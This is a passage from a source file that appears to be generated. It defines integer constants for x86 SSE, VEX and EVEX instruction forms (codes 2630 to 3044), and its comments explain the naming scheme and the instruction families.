VEX_VTESTPS_YMM_YMMM256: int = 2630
VEX_VTESTPD_XMM_XMMM128: int = 2631
VEX_VTESTPD_YMM_YMMM256: int = 2632
PBLENDVB_XMM_XMMM128: int = 2633
EVEX_VPSRLVW_XMM_K1Z_XMM_XMMM128: int = 2634
EVEX_VPSRLVW_YMM_K1Z_YMM_YMMM256: int = 2635
EVEX_VPSRLVW_ZMM_K1Z_ZMM_ZMMM512: int = 2636
EVEX_VPMOVUSWB_XMMM64_K1Z_XMM: int = 2637
EVEX_VPMOVUSWB_XMMM128_K1Z_YMM: int = 2638
EVEX_VPMOVUSWB_YMMM256_K1Z_ZMM: int = 2639
EVEX_VPSRAVW_XMM_K1Z_XMM_XMMM128: int = 2640
EVEX_VPSRAVW_YMM_K1Z_YMM_YMMM256: int = 2641
EVEX_VPSRAVW_ZMM_K1Z_ZMM_ZMMM512: int = 2642
EVEX_VPMOVUSDB_XMMM32_K1Z_XMM: int = 2643
EVEX_VPMOVUSDB_XMMM64_K1Z_YMM: int = 2644
EVEX_VPMOVUSDB_XMMM128_K1Z_ZMM: int = 2645
EVEX_VPSLLVW_XMM_K1Z_XMM_XMMM128: int = 2646
EVEX_VPSLLVW_YMM_K1Z_YMM_YMMM256: int = 2647
EVEX_VPSLLVW_ZMM_K1Z_ZMM_ZMMM512: int = 2648
EVEX_VPMOVUSQB_XMMM16_K1Z_XMM: int = 2649
EVEX_VPMOVUSQB_XMMM32_K1Z_YMM: int = 2650
EVEX_VPMOVUSQB_XMMM64_K1Z_ZMM: int = 2651
VEX_VCVTPH2PS_XMM_XMMM64: int = 2652
VEX_VCVTPH2PS_YMM_XMMM128: int = 2653
EVEX_VCVTPH2PS_XMM_K1Z_XMMM64: int = 2654
EVEX_VCVTPH2PS_YMM_K1Z_XMMM128: int = 2655
EVEX_VCVTPH2PS_ZMM_K1Z_YMMM256_SAE: int = 2656
EVEX_VPMOVUSDW_XMMM64_K1Z_XMM: int = 2657
EVEX_VPMOVUSDW_XMMM128_K1Z_YMM: int = 2658
EVEX_VPMOVUSDW_YMMM256_K1Z_ZMM: int = 2659
BLENDVPS_XMM_XMMM128: int = 2660
EVEX_VPRORVD_XMM_K1Z_XMM_XMMM128B32: int = 2661
EVEX_VPRORVD_YMM_K1Z_YMM_YMMM256B32: int = 2662
EVEX_VPRORVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2663
EVEX_VPRORVQ_XMM_K1Z_XMM_XMMM128B64: int = 2664
EVEX_VPRORVQ_YMM_K1Z_YMM_YMMM256B64: int = 2665
EVEX_VPRORVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2666
EVEX_VPMOVUSQW_XMMM32_K1Z_XMM: int = 2667
EVEX_VPMOVUSQW_XMMM64_K1Z_YMM: int = 2668
EVEX_VPMOVUSQW_XMMM128_K1Z_ZMM: int = 2669
BLENDVPD_XMM_XMMM128: int = 2670
EVEX_VPROLVD_XMM_K1Z_XMM_XMMM128B32: int = 2671
EVEX_VPROLVD_YMM_K1Z_YMM_YMMM256B32: int = 2672
EVEX_VPROLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2673
EVEX_VPROLVQ_XMM_K1Z_XMM_XMMM128B64: int = 2674
EVEX_VPROLVQ_YMM_K1Z_YMM_YMMM256B64: int = 2675
EVEX_VPROLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2676
EVEX_VPMOVUSQD_XMMM64_K1Z_XMM: int = 2677
EVEX_VPMOVUSQD_XMMM128_K1Z_YMM: int = 2678
EVEX_VPMOVUSQD_YMMM256_K1Z_ZMM: int = 2679
VEX_VPERMPS_YMM_YMM_YMMM256: int = 2680
EVEX_VPERMPS_YMM_K1Z_YMM_YMMM256B32: int = 2681
EVEX_VPERMPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 2682
EVEX_VPERMPD_YMM_K1Z_YMM_YMMM256B64: int = 2683
EVEX_VPERMPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 2684
PTEST_XMM_XMMM128: int = 2685
VEX_VPTEST_XMM_XMMM128: int = 2686
VEX_VPTEST_YMM_YMMM256: int = 2687
VEX_VBROADCASTSS_XMM_M32: int = 2688
VEX_VBROADCASTSS_YMM_M32: int = 2689
EVEX_VBROADCASTSS_XMM_K1Z_XMMM32: int = 2690
EVEX_VBROADCASTSS_YMM_K1Z_XMMM32: int = 2691
EVEX_VBROADCASTSS_ZMM_K1Z_XMMM32: int = 2692
VEX_VBROADCASTSD_YMM_M64: int = 2693
EVEX_VBROADCASTF32X2_YMM_K1Z_XMMM64: int = 2694
EVEX_VBROADCASTF32X2_ZMM_K1Z_XMMM64: int = 2695
EVEX_VBROADCASTSD_YMM_K1Z_XMMM64: int = 2696
EVEX_VBROADCASTSD_ZMM_K1Z_XMMM64: int = 2697
VEX_VBROADCASTF128_YMM_M128: int = 2698
EVEX_VBROADCASTF32X4_YMM_K1Z_M128: int = 2699
EVEX_VBROADCASTF32X4_ZMM_K1Z_M128: int = 2700
EVEX_VBROADCASTF64X2_YMM_K1Z_M128: int = 2701
EVEX_VBROADCASTF64X2_ZMM_K1Z_M128: int = 2702
EVEX_VBROADCASTF32X8_ZMM_K1Z_M256: int = 2703
EVEX_VBROADCASTF64X4_ZMM_K1Z_M256: int = 2704
PABSB_MM_MMM64: int = 2705
PABSB_XMM_XMMM128: int = 2706
VEX_VPABSB_XMM_XMMM128: int = 2707
VEX_VPABSB_YMM_YMMM256: int = 2708
EVEX_VPABSB_XMM_K1Z_XMMM128: int = 2709
EVEX_VPABSB_YMM_K1Z_YMMM256: int = 2710
# ---------------------------------------------------------------------------
# Instruction-form identifier table (generated-style data — do not hand-edit).
#
# Each constant maps a unique instruction form to a sequential integer code.
# The values in this visible range run consecutively from 2711 to 3521 with
# no gaps, so the numbering is order-dependent: do not reorder, insert, or
# renumber entries.
#
# Naming convention (as evidenced by the entries themselves; presumably the
# iced-x86 scheme — TODO confirm against upstream docs):
#   * Leading VEX_/EVEX_ marks the instruction encoding; no prefix means the
#     legacy/SSE encoding (e.g. PABSW_XMM_XMMM128 vs VEX_VPABSW_...).
#   * Operand tokens follow the mnemonic: XMM/YMM/ZMM (vector regs),
#     XMMM128 etc. (reg-or-memory), M128/M256/M512 (memory only),
#     R32/R64 (GPRs), KR (opmask register), VM32X/VM64Z etc.
#     (vector-memory gather/scatter index forms).
#   * EVEX decorator suffixes: K1/K1Z (opmask, Z = zeroing-masking),
#     B32/B64 (embedded broadcast element width), ER (embedded rounding),
#     SAE (suppress-all-exceptions).
# ---------------------------------------------------------------------------
EVEX_VPABSB_ZMM_K1Z_ZMMM512: int = 2711
PABSW_MM_MMM64: int = 2712
PABSW_XMM_XMMM128: int = 2713
VEX_VPABSW_XMM_XMMM128: int = 2714
VEX_VPABSW_YMM_YMMM256: int = 2715
EVEX_VPABSW_XMM_K1Z_XMMM128: int = 2716
EVEX_VPABSW_YMM_K1Z_YMMM256: int = 2717
EVEX_VPABSW_ZMM_K1Z_ZMMM512: int = 2718
PABSD_MM_MMM64: int = 2719
PABSD_XMM_XMMM128: int = 2720
VEX_VPABSD_XMM_XMMM128: int = 2721
VEX_VPABSD_YMM_YMMM256: int = 2722
EVEX_VPABSD_XMM_K1Z_XMMM128B32: int = 2723
EVEX_VPABSD_YMM_K1Z_YMMM256B32: int = 2724
EVEX_VPABSD_ZMM_K1Z_ZMMM512B32: int = 2725
EVEX_VPABSQ_XMM_K1Z_XMMM128B64: int = 2726
EVEX_VPABSQ_YMM_K1Z_YMMM256B64: int = 2727
EVEX_VPABSQ_ZMM_K1Z_ZMMM512B64: int = 2728
# PMOVSX*/VPMOVS* — packed sign-extend (and EVEX truncating down-convert) forms.
PMOVSXBW_XMM_XMMM64: int = 2729
VEX_VPMOVSXBW_XMM_XMMM64: int = 2730
VEX_VPMOVSXBW_YMM_XMMM128: int = 2731
EVEX_VPMOVSXBW_XMM_K1Z_XMMM64: int = 2732
EVEX_VPMOVSXBW_YMM_K1Z_XMMM128: int = 2733
EVEX_VPMOVSXBW_ZMM_K1Z_YMMM256: int = 2734
EVEX_VPMOVSWB_XMMM64_K1Z_XMM: int = 2735
EVEX_VPMOVSWB_XMMM128_K1Z_YMM: int = 2736
EVEX_VPMOVSWB_YMMM256_K1Z_ZMM: int = 2737
PMOVSXBD_XMM_XMMM32: int = 2738
VEX_VPMOVSXBD_XMM_XMMM32: int = 2739
VEX_VPMOVSXBD_YMM_XMMM64: int = 2740
EVEX_VPMOVSXBD_XMM_K1Z_XMMM32: int = 2741
EVEX_VPMOVSXBD_YMM_K1Z_XMMM64: int = 2742
EVEX_VPMOVSXBD_ZMM_K1Z_XMMM128: int = 2743
EVEX_VPMOVSDB_XMMM32_K1Z_XMM: int = 2744
EVEX_VPMOVSDB_XMMM64_K1Z_YMM: int = 2745
EVEX_VPMOVSDB_XMMM128_K1Z_ZMM: int = 2746
PMOVSXBQ_XMM_XMMM16: int = 2747
VEX_VPMOVSXBQ_XMM_XMMM16: int = 2748
VEX_VPMOVSXBQ_YMM_XMMM32: int = 2749
EVEX_VPMOVSXBQ_XMM_K1Z_XMMM16: int = 2750
EVEX_VPMOVSXBQ_YMM_K1Z_XMMM32: int = 2751
EVEX_VPMOVSXBQ_ZMM_K1Z_XMMM64: int = 2752
EVEX_VPMOVSQB_XMMM16_K1Z_XMM: int = 2753
EVEX_VPMOVSQB_XMMM32_K1Z_YMM: int = 2754
EVEX_VPMOVSQB_XMMM64_K1Z_ZMM: int = 2755
PMOVSXWD_XMM_XMMM64: int = 2756
VEX_VPMOVSXWD_XMM_XMMM64: int = 2757
VEX_VPMOVSXWD_YMM_XMMM128: int = 2758
EVEX_VPMOVSXWD_XMM_K1Z_XMMM64: int = 2759
EVEX_VPMOVSXWD_YMM_K1Z_XMMM128: int = 2760
EVEX_VPMOVSXWD_ZMM_K1Z_YMMM256: int = 2761
EVEX_VPMOVSDW_XMMM64_K1Z_XMM: int = 2762
EVEX_VPMOVSDW_XMMM128_K1Z_YMM: int = 2763
EVEX_VPMOVSDW_YMMM256_K1Z_ZMM: int = 2764
PMOVSXWQ_XMM_XMMM32: int = 2765
VEX_VPMOVSXWQ_XMM_XMMM32: int = 2766
VEX_VPMOVSXWQ_YMM_XMMM64: int = 2767
EVEX_VPMOVSXWQ_XMM_K1Z_XMMM32: int = 2768
EVEX_VPMOVSXWQ_YMM_K1Z_XMMM64: int = 2769
EVEX_VPMOVSXWQ_ZMM_K1Z_XMMM128: int = 2770
EVEX_VPMOVSQW_XMMM32_K1Z_XMM: int = 2771
EVEX_VPMOVSQW_XMMM64_K1Z_YMM: int = 2772
EVEX_VPMOVSQW_XMMM128_K1Z_ZMM: int = 2773
PMOVSXDQ_XMM_XMMM64: int = 2774
VEX_VPMOVSXDQ_XMM_XMMM64: int = 2775
VEX_VPMOVSXDQ_YMM_XMMM128: int = 2776
EVEX_VPMOVSXDQ_XMM_K1Z_XMMM64: int = 2777
EVEX_VPMOVSXDQ_YMM_K1Z_XMMM128: int = 2778
EVEX_VPMOVSXDQ_ZMM_K1Z_YMMM256: int = 2779
EVEX_VPMOVSQD_XMMM64_K1Z_XMM: int = 2780
EVEX_VPMOVSQD_XMMM128_K1Z_YMM: int = 2781
EVEX_VPMOVSQD_YMMM256_K1Z_ZMM: int = 2782
# VPTESTM*/VPTESTNM* — EVEX test-against-mask forms writing an opmask (KR) result.
EVEX_VPTESTMB_KR_K1_XMM_XMMM128: int = 2783
EVEX_VPTESTMB_KR_K1_YMM_YMMM256: int = 2784
EVEX_VPTESTMB_KR_K1_ZMM_ZMMM512: int = 2785
EVEX_VPTESTMW_KR_K1_XMM_XMMM128: int = 2786
EVEX_VPTESTMW_KR_K1_YMM_YMMM256: int = 2787
EVEX_VPTESTMW_KR_K1_ZMM_ZMMM512: int = 2788
EVEX_VPTESTNMB_KR_K1_XMM_XMMM128: int = 2789
EVEX_VPTESTNMB_KR_K1_YMM_YMMM256: int = 2790
EVEX_VPTESTNMB_KR_K1_ZMM_ZMMM512: int = 2791
EVEX_VPTESTNMW_KR_K1_XMM_XMMM128: int = 2792
EVEX_VPTESTNMW_KR_K1_YMM_YMMM256: int = 2793
EVEX_VPTESTNMW_KR_K1_ZMM_ZMMM512: int = 2794
EVEX_VPTESTMD_KR_K1_XMM_XMMM128B32: int = 2795
EVEX_VPTESTMD_KR_K1_YMM_YMMM256B32: int = 2796
EVEX_VPTESTMD_KR_K1_ZMM_ZMMM512B32: int = 2797
EVEX_VPTESTMQ_KR_K1_XMM_XMMM128B64: int = 2798
EVEX_VPTESTMQ_KR_K1_YMM_YMMM256B64: int = 2799
EVEX_VPTESTMQ_KR_K1_ZMM_ZMMM512B64: int = 2800
EVEX_VPTESTNMD_KR_K1_XMM_XMMM128B32: int = 2801
EVEX_VPTESTNMD_KR_K1_YMM_YMMM256B32: int = 2802
EVEX_VPTESTNMD_KR_K1_ZMM_ZMMM512B32: int = 2803
EVEX_VPTESTNMQ_KR_K1_XMM_XMMM128B64: int = 2804
EVEX_VPTESTNMQ_KR_K1_YMM_YMMM256B64: int = 2805
EVEX_VPTESTNMQ_KR_K1_ZMM_ZMMM512B64: int = 2806
PMULDQ_XMM_XMMM128: int = 2807
VEX_VPMULDQ_XMM_XMM_XMMM128: int = 2808
VEX_VPMULDQ_YMM_YMM_YMMM256: int = 2809
EVEX_VPMULDQ_XMM_K1Z_XMM_XMMM128B64: int = 2810
EVEX_VPMULDQ_YMM_K1Z_YMM_YMMM256B64: int = 2811
EVEX_VPMULDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2812
# VPMOVM2*/VPMOV*2M — mask-register <-> vector-register conversion forms.
EVEX_VPMOVM2B_XMM_KR: int = 2813
EVEX_VPMOVM2B_YMM_KR: int = 2814
EVEX_VPMOVM2B_ZMM_KR: int = 2815
EVEX_VPMOVM2W_XMM_KR: int = 2816
EVEX_VPMOVM2W_YMM_KR: int = 2817
EVEX_VPMOVM2W_ZMM_KR: int = 2818
PCMPEQQ_XMM_XMMM128: int = 2819
VEX_VPCMPEQQ_XMM_XMM_XMMM128: int = 2820
VEX_VPCMPEQQ_YMM_YMM_YMMM256: int = 2821
EVEX_VPCMPEQQ_KR_K1_XMM_XMMM128B64: int = 2822
EVEX_VPCMPEQQ_KR_K1_YMM_YMMM256B64: int = 2823
EVEX_VPCMPEQQ_KR_K1_ZMM_ZMMM512B64: int = 2824
EVEX_VPMOVB2M_KR_XMM: int = 2825
EVEX_VPMOVB2M_KR_YMM: int = 2826
EVEX_VPMOVB2M_KR_ZMM: int = 2827
EVEX_VPMOVW2M_KR_XMM: int = 2828
EVEX_VPMOVW2M_KR_YMM: int = 2829
EVEX_VPMOVW2M_KR_ZMM: int = 2830
MOVNTDQA_XMM_M128: int = 2831
VEX_VMOVNTDQA_XMM_M128: int = 2832
VEX_VMOVNTDQA_YMM_M256: int = 2833
EVEX_VMOVNTDQA_XMM_M128: int = 2834
EVEX_VMOVNTDQA_YMM_M256: int = 2835
EVEX_VMOVNTDQA_ZMM_M512: int = 2836
EVEX_VPBROADCASTMB2Q_XMM_KR: int = 2837
EVEX_VPBROADCASTMB2Q_YMM_KR: int = 2838
EVEX_VPBROADCASTMB2Q_ZMM_KR: int = 2839
PACKUSDW_XMM_XMMM128: int = 2840
VEX_VPACKUSDW_XMM_XMM_XMMM128: int = 2841
VEX_VPACKUSDW_YMM_YMM_YMMM256: int = 2842
EVEX_VPACKUSDW_XMM_K1Z_XMM_XMMM128B32: int = 2843
EVEX_VPACKUSDW_YMM_K1Z_YMM_YMMM256B32: int = 2844
EVEX_VPACKUSDW_ZMM_K1Z_ZMM_ZMMM512B32: int = 2845
VEX_VMASKMOVPS_XMM_XMM_M128: int = 2846
VEX_VMASKMOVPS_YMM_YMM_M256: int = 2847
EVEX_VSCALEFPS_XMM_K1Z_XMM_XMMM128B32: int = 2848
EVEX_VSCALEFPS_YMM_K1Z_YMM_YMMM256B32: int = 2849
EVEX_VSCALEFPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 2850
EVEX_VSCALEFPD_XMM_K1Z_XMM_XMMM128B64: int = 2851
EVEX_VSCALEFPD_YMM_K1Z_YMM_YMMM256B64: int = 2852
EVEX_VSCALEFPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 2853
VEX_VMASKMOVPD_XMM_XMM_M128: int = 2854
VEX_VMASKMOVPD_YMM_YMM_M256: int = 2855
EVEX_VSCALEFSS_XMM_K1Z_XMM_XMMM32_ER: int = 2856
EVEX_VSCALEFSD_XMM_K1Z_XMM_XMMM64_ER: int = 2857
VEX_VMASKMOVPS_M128_XMM_XMM: int = 2858
VEX_VMASKMOVPS_M256_YMM_YMM: int = 2859
VEX_VMASKMOVPD_M128_XMM_XMM: int = 2860
VEX_VMASKMOVPD_M256_YMM_YMM: int = 2861
# PMOVZX*/VPMOVZ* — packed zero-extend (and EVEX down-convert) forms.
PMOVZXBW_XMM_XMMM64: int = 2862
VEX_VPMOVZXBW_XMM_XMMM64: int = 2863
VEX_VPMOVZXBW_YMM_XMMM128: int = 2864
EVEX_VPMOVZXBW_XMM_K1Z_XMMM64: int = 2865
EVEX_VPMOVZXBW_YMM_K1Z_XMMM128: int = 2866
EVEX_VPMOVZXBW_ZMM_K1Z_YMMM256: int = 2867
EVEX_VPMOVWB_XMMM64_K1Z_XMM: int = 2868
EVEX_VPMOVWB_XMMM128_K1Z_YMM: int = 2869
EVEX_VPMOVWB_YMMM256_K1Z_ZMM: int = 2870
PMOVZXBD_XMM_XMMM32: int = 2871
VEX_VPMOVZXBD_XMM_XMMM32: int = 2872
VEX_VPMOVZXBD_YMM_XMMM64: int = 2873
EVEX_VPMOVZXBD_XMM_K1Z_XMMM32: int = 2874
EVEX_VPMOVZXBD_YMM_K1Z_XMMM64: int = 2875
EVEX_VPMOVZXBD_ZMM_K1Z_XMMM128: int = 2876
EVEX_VPMOVDB_XMMM32_K1Z_XMM: int = 2877
EVEX_VPMOVDB_XMMM64_K1Z_YMM: int = 2878
EVEX_VPMOVDB_XMMM128_K1Z_ZMM: int = 2879
PMOVZXBQ_XMM_XMMM16: int = 2880
VEX_VPMOVZXBQ_XMM_XMMM16: int = 2881
VEX_VPMOVZXBQ_YMM_XMMM32: int = 2882
EVEX_VPMOVZXBQ_XMM_K1Z_XMMM16: int = 2883
EVEX_VPMOVZXBQ_YMM_K1Z_XMMM32: int = 2884
EVEX_VPMOVZXBQ_ZMM_K1Z_XMMM64: int = 2885
EVEX_VPMOVQB_XMMM16_K1Z_XMM: int = 2886
EVEX_VPMOVQB_XMMM32_K1Z_YMM: int = 2887
EVEX_VPMOVQB_XMMM64_K1Z_ZMM: int = 2888
PMOVZXWD_XMM_XMMM64: int = 2889
VEX_VPMOVZXWD_XMM_XMMM64: int = 2890
VEX_VPMOVZXWD_YMM_XMMM128: int = 2891
EVEX_VPMOVZXWD_XMM_K1Z_XMMM64: int = 2892
EVEX_VPMOVZXWD_YMM_K1Z_XMMM128: int = 2893
EVEX_VPMOVZXWD_ZMM_K1Z_YMMM256: int = 2894
EVEX_VPMOVDW_XMMM64_K1Z_XMM: int = 2895
EVEX_VPMOVDW_XMMM128_K1Z_YMM: int = 2896
EVEX_VPMOVDW_YMMM256_K1Z_ZMM: int = 2897
PMOVZXWQ_XMM_XMMM32: int = 2898
VEX_VPMOVZXWQ_XMM_XMMM32: int = 2899
VEX_VPMOVZXWQ_YMM_XMMM64: int = 2900
EVEX_VPMOVZXWQ_XMM_K1Z_XMMM32: int = 2901
EVEX_VPMOVZXWQ_YMM_K1Z_XMMM64: int = 2902
EVEX_VPMOVZXWQ_ZMM_K1Z_XMMM128: int = 2903
EVEX_VPMOVQW_XMMM32_K1Z_XMM: int = 2904
EVEX_VPMOVQW_XMMM64_K1Z_YMM: int = 2905
EVEX_VPMOVQW_XMMM128_K1Z_ZMM: int = 2906
PMOVZXDQ_XMM_XMMM64: int = 2907
VEX_VPMOVZXDQ_XMM_XMMM64: int = 2908
VEX_VPMOVZXDQ_YMM_XMMM128: int = 2909
EVEX_VPMOVZXDQ_XMM_K1Z_XMMM64: int = 2910
EVEX_VPMOVZXDQ_YMM_K1Z_XMMM128: int = 2911
EVEX_VPMOVZXDQ_ZMM_K1Z_YMMM256: int = 2912
EVEX_VPMOVQD_XMMM64_K1Z_XMM: int = 2913
EVEX_VPMOVQD_XMMM128_K1Z_YMM: int = 2914
EVEX_VPMOVQD_YMMM256_K1Z_ZMM: int = 2915
VEX_VPERMD_YMM_YMM_YMMM256: int = 2916
EVEX_VPERMD_YMM_K1Z_YMM_YMMM256B32: int = 2917
EVEX_VPERMD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2918
EVEX_VPERMQ_YMM_K1Z_YMM_YMMM256B64: int = 2919
EVEX_VPERMQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2920
PCMPGTQ_XMM_XMMM128: int = 2921
VEX_VPCMPGTQ_XMM_XMM_XMMM128: int = 2922
VEX_VPCMPGTQ_YMM_YMM_YMMM256: int = 2923
EVEX_VPCMPGTQ_KR_K1_XMM_XMMM128B64: int = 2924
EVEX_VPCMPGTQ_KR_K1_YMM_YMMM256B64: int = 2925
EVEX_VPCMPGTQ_KR_K1_ZMM_ZMMM512B64: int = 2926
# PMIN*/PMAX* — packed signed/unsigned min/max families.
PMINSB_XMM_XMMM128: int = 2927
VEX_VPMINSB_XMM_XMM_XMMM128: int = 2928
VEX_VPMINSB_YMM_YMM_YMMM256: int = 2929
EVEX_VPMINSB_XMM_K1Z_XMM_XMMM128: int = 2930
EVEX_VPMINSB_YMM_K1Z_YMM_YMMM256: int = 2931
EVEX_VPMINSB_ZMM_K1Z_ZMM_ZMMM512: int = 2932
EVEX_VPMOVM2D_XMM_KR: int = 2933
EVEX_VPMOVM2D_YMM_KR: int = 2934
EVEX_VPMOVM2D_ZMM_KR: int = 2935
EVEX_VPMOVM2Q_XMM_KR: int = 2936
EVEX_VPMOVM2Q_YMM_KR: int = 2937
EVEX_VPMOVM2Q_ZMM_KR: int = 2938
PMINSD_XMM_XMMM128: int = 2939
VEX_VPMINSD_XMM_XMM_XMMM128: int = 2940
VEX_VPMINSD_YMM_YMM_YMMM256: int = 2941
EVEX_VPMINSD_XMM_K1Z_XMM_XMMM128B32: int = 2942
EVEX_VPMINSD_YMM_K1Z_YMM_YMMM256B32: int = 2943
EVEX_VPMINSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2944
EVEX_VPMINSQ_XMM_K1Z_XMM_XMMM128B64: int = 2945
EVEX_VPMINSQ_YMM_K1Z_YMM_YMMM256B64: int = 2946
EVEX_VPMINSQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2947
EVEX_VPMOVD2M_KR_XMM: int = 2948
EVEX_VPMOVD2M_KR_YMM: int = 2949
EVEX_VPMOVD2M_KR_ZMM: int = 2950
EVEX_VPMOVQ2M_KR_XMM: int = 2951
EVEX_VPMOVQ2M_KR_YMM: int = 2952
EVEX_VPMOVQ2M_KR_ZMM: int = 2953
PMINUW_XMM_XMMM128: int = 2954
VEX_VPMINUW_XMM_XMM_XMMM128: int = 2955
VEX_VPMINUW_YMM_YMM_YMMM256: int = 2956
EVEX_VPMINUW_XMM_K1Z_XMM_XMMM128: int = 2957
EVEX_VPMINUW_YMM_K1Z_YMM_YMMM256: int = 2958
EVEX_VPMINUW_ZMM_K1Z_ZMM_ZMMM512: int = 2959
EVEX_VPBROADCASTMW2D_XMM_KR: int = 2960
EVEX_VPBROADCASTMW2D_YMM_KR: int = 2961
EVEX_VPBROADCASTMW2D_ZMM_KR: int = 2962
PMINUD_XMM_XMMM128: int = 2963
VEX_VPMINUD_XMM_XMM_XMMM128: int = 2964
VEX_VPMINUD_YMM_YMM_YMMM256: int = 2965
EVEX_VPMINUD_XMM_K1Z_XMM_XMMM128B32: int = 2966
EVEX_VPMINUD_YMM_K1Z_YMM_YMMM256B32: int = 2967
EVEX_VPMINUD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2968
EVEX_VPMINUQ_XMM_K1Z_XMM_XMMM128B64: int = 2969
EVEX_VPMINUQ_YMM_K1Z_YMM_YMMM256B64: int = 2970
EVEX_VPMINUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2971
PMAXSB_XMM_XMMM128: int = 2972
VEX_VPMAXSB_XMM_XMM_XMMM128: int = 2973
VEX_VPMAXSB_YMM_YMM_YMMM256: int = 2974
EVEX_VPMAXSB_XMM_K1Z_XMM_XMMM128: int = 2975
EVEX_VPMAXSB_YMM_K1Z_YMM_YMMM256: int = 2976
EVEX_VPMAXSB_ZMM_K1Z_ZMM_ZMMM512: int = 2977
PMAXSD_XMM_XMMM128: int = 2978
VEX_VPMAXSD_XMM_XMM_XMMM128: int = 2979
VEX_VPMAXSD_YMM_YMM_YMMM256: int = 2980
EVEX_VPMAXSD_XMM_K1Z_XMM_XMMM128B32: int = 2981
EVEX_VPMAXSD_YMM_K1Z_YMM_YMMM256B32: int = 2982
EVEX_VPMAXSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2983
EVEX_VPMAXSQ_XMM_K1Z_XMM_XMMM128B64: int = 2984
EVEX_VPMAXSQ_YMM_K1Z_YMM_YMMM256B64: int = 2985
EVEX_VPMAXSQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2986
PMAXUW_XMM_XMMM128: int = 2987
VEX_VPMAXUW_XMM_XMM_XMMM128: int = 2988
VEX_VPMAXUW_YMM_YMM_YMMM256: int = 2989
EVEX_VPMAXUW_XMM_K1Z_XMM_XMMM128: int = 2990
EVEX_VPMAXUW_YMM_K1Z_YMM_YMMM256: int = 2991
EVEX_VPMAXUW_ZMM_K1Z_ZMM_ZMMM512: int = 2992
PMAXUD_XMM_XMMM128: int = 2993
VEX_VPMAXUD_XMM_XMM_XMMM128: int = 2994
VEX_VPMAXUD_YMM_YMM_YMMM256: int = 2995
EVEX_VPMAXUD_XMM_K1Z_XMM_XMMM128B32: int = 2996
EVEX_VPMAXUD_YMM_K1Z_YMM_YMMM256B32: int = 2997
EVEX_VPMAXUD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2998
EVEX_VPMAXUQ_XMM_K1Z_XMM_XMMM128B64: int = 2999
EVEX_VPMAXUQ_YMM_K1Z_YMM_YMMM256B64: int = 3000
EVEX_VPMAXUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3001
PMULLD_XMM_XMMM128: int = 3002
VEX_VPMULLD_XMM_XMM_XMMM128: int = 3003
VEX_VPMULLD_YMM_YMM_YMMM256: int = 3004
EVEX_VPMULLD_XMM_K1Z_XMM_XMMM128B32: int = 3005
EVEX_VPMULLD_YMM_K1Z_YMM_YMMM256B32: int = 3006
EVEX_VPMULLD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3007
EVEX_VPMULLQ_XMM_K1Z_XMM_XMMM128B64: int = 3008
EVEX_VPMULLQ_YMM_K1Z_YMM_YMMM256B64: int = 3009
EVEX_VPMULLQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3010
PHMINPOSUW_XMM_XMMM128: int = 3011
VEX_VPHMINPOSUW_XMM_XMMM128: int = 3012
EVEX_VGETEXPPS_XMM_K1Z_XMMM128B32: int = 3013
EVEX_VGETEXPPS_YMM_K1Z_YMMM256B32: int = 3014
EVEX_VGETEXPPS_ZMM_K1Z_ZMMM512B32_SAE: int = 3015
EVEX_VGETEXPPD_XMM_K1Z_XMMM128B64: int = 3016
EVEX_VGETEXPPD_YMM_K1Z_YMMM256B64: int = 3017
EVEX_VGETEXPPD_ZMM_K1Z_ZMMM512B64_SAE: int = 3018
EVEX_VGETEXPSS_XMM_K1Z_XMM_XMMM32_SAE: int = 3019
EVEX_VGETEXPSD_XMM_K1Z_XMM_XMMM64_SAE: int = 3020
EVEX_VPLZCNTD_XMM_K1Z_XMMM128B32: int = 3021
EVEX_VPLZCNTD_YMM_K1Z_YMMM256B32: int = 3022
EVEX_VPLZCNTD_ZMM_K1Z_ZMMM512B32: int = 3023
EVEX_VPLZCNTQ_XMM_K1Z_XMMM128B64: int = 3024
EVEX_VPLZCNTQ_YMM_K1Z_YMMM256B64: int = 3025
EVEX_VPLZCNTQ_ZMM_K1Z_ZMMM512B64: int = 3026
# VPSRLV/VPSRAV/VPSLLV — per-element variable shift forms.
VEX_VPSRLVD_XMM_XMM_XMMM128: int = 3027
VEX_VPSRLVD_YMM_YMM_YMMM256: int = 3028
VEX_VPSRLVQ_XMM_XMM_XMMM128: int = 3029
VEX_VPSRLVQ_YMM_YMM_YMMM256: int = 3030
EVEX_VPSRLVD_XMM_K1Z_XMM_XMMM128B32: int = 3031
EVEX_VPSRLVD_YMM_K1Z_YMM_YMMM256B32: int = 3032
EVEX_VPSRLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3033
EVEX_VPSRLVQ_XMM_K1Z_XMM_XMMM128B64: int = 3034
EVEX_VPSRLVQ_YMM_K1Z_YMM_YMMM256B64: int = 3035
EVEX_VPSRLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3036
VEX_VPSRAVD_XMM_XMM_XMMM128: int = 3037
VEX_VPSRAVD_YMM_YMM_YMMM256: int = 3038
EVEX_VPSRAVD_XMM_K1Z_XMM_XMMM128B32: int = 3039
EVEX_VPSRAVD_YMM_K1Z_YMM_YMMM256B32: int = 3040
EVEX_VPSRAVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3041
EVEX_VPSRAVQ_XMM_K1Z_XMM_XMMM128B64: int = 3042
EVEX_VPSRAVQ_YMM_K1Z_YMM_YMMM256B64: int = 3043
EVEX_VPSRAVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3044
